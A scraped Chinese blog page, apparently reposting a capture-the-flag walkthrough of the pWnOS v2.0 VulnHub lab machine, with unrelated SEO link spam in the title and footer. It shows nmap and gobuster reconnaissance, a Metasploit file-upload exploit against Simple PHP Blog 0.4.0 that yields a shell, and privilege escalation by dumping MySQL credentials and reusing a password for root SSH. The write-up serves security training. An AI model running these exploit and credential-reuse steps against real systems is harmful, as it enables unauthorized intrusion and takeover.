当前位置: 首页 > news >正文

js写的网站怎么做seo平台推广销售话术

js写的网站怎么做seo,平台推广销售话术,国家林草局三北防护林建设局网站,怎样做网站管理与维护知识点总结: 1.通过模块来寻找漏洞 2.msf查找漏洞 3.通过网站源代码,查看模块信息 环境准备 攻击机:kali2023 靶机:pWnOS v2.0 安装地址:pWnOS: 2.0 (Pre-Release) ~ VulnHub 在安装网址中看到,该靶…

 知识点总结:

1.通过模块来寻找漏洞

2.msf查找漏洞

3.通过网站源代码,查看模块信息

环境准备

攻击机:kali2023

靶机:pWnOS v2.0

安装地址:pWnOS: 2.0 (Pre-Release) ~ VulnHub

在安装网址中看到,该靶机静态IP为10.10.10.100

所以我们就要修改虚拟机的"虚拟网络编辑器"

 其次靶机的虚拟机设置如下:

开始渗透!

信息收集

收集IP(虽然已经知道了)

arp-scan -l

 端口扫描

先大概看一下

nmap 10.10.10.100

再详细看一下

nmap -A -p- 10.10.10.100

看到内核版本等

访问一下80端口

扫一下目录

gobuster dir -u http://10.10.10.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt

扫到了/blog目录,访问

查看源代码

查看到建立博客的模块模版是Simple PHP Blog 0.4.0

漏洞查找

msf查找有没有现成的漏洞

search Simple PHP Blog 0.4.0

存在,那我们直接利用

use unix/webapp/sphpblog_file_upload
set Rhost 10.10.10.100
set uri /blog      //填有该模块的url,此处写为uri
run                  //运行
shell                  //开启命令行
python -c 'import pty;pty.spawn("/bin/bash")'  //优化命令行

提权

查看一下目录

存在文件:mysqli_connect.php,看看

拿到数据库root密码,登录

看看能不能拿到相关账户密码,分别执行下述命令爆库

show databases;
use mysql;
show tables;
select * from user;

最后看到

看到root的好多密码都是一致的,具体解密我也不知道,所以没有解密成功!

但是我们可以用上面的那个密码再登录一下ssh试试

ssh root@10.10.10.100

 成功root!

http://www.zhongyajixie.com/news/29506.html

相关文章:

  • wordpress 4.2.2杭州关键词优化外包
  • 专业制作网站推荐外贸营销型网站制作
  • 广州网站建设加q479185700三只松鼠口碑营销案例
  • 如何k掉别人的网站网络营销课程速成班
  • 怎样设计一个网站平台品牌型网站设计推荐
  • 网站建设实践论文优化公司排名
  • 潍坊网站制作人才招聘山西seo谷歌关键词优化工具
  • 广州口碑好的网站建设设计培训班招生方案有哪些
  • 谁可以教我做网站网上电商平台开发
  • 制作网页入门软件赣州seo培训
  • 金寨县建设规划局网站搜索引擎seo排名优化
  • 前端代码大全东莞seo推广机构帖子
  • 网站开发有哪些常用工具新闻稿发布
  • 县政府网站建设总结企业优化推广
  • 厦门跨境电商前十深圳seo排名优化
  • 网站开发网校个人免费域名注册网站
  • 学做网站看那个网泉州网站建设
  • 设计logo的方法网站关键词优化方法
  • 网站建设工作室的营销方式创业计划书微信指数是搜索量吗
  • 长春专业做网站的公司关键词免费下载
  • 黑客怎么攻击网站小广告设计
  • 钓鱼网站制作的报告seo平台是什么
  • 行知智网站建设营销比较好的知名公司有哪些
  • 执念待重生wordpressseo自学网官方
  • 建设信用卡积分兑换商城网站行业关键词查询
  • 数字域名做网站搭建网站教程
  • 个人备案网站内不能出现什么内容推广营销软件app
  • 网站域名变更怎么查电商网站
  • 潍坊网站建设电话北京seo排名服务
  • 国内做化妆刷的比较好的网站长沙百度关键词搜索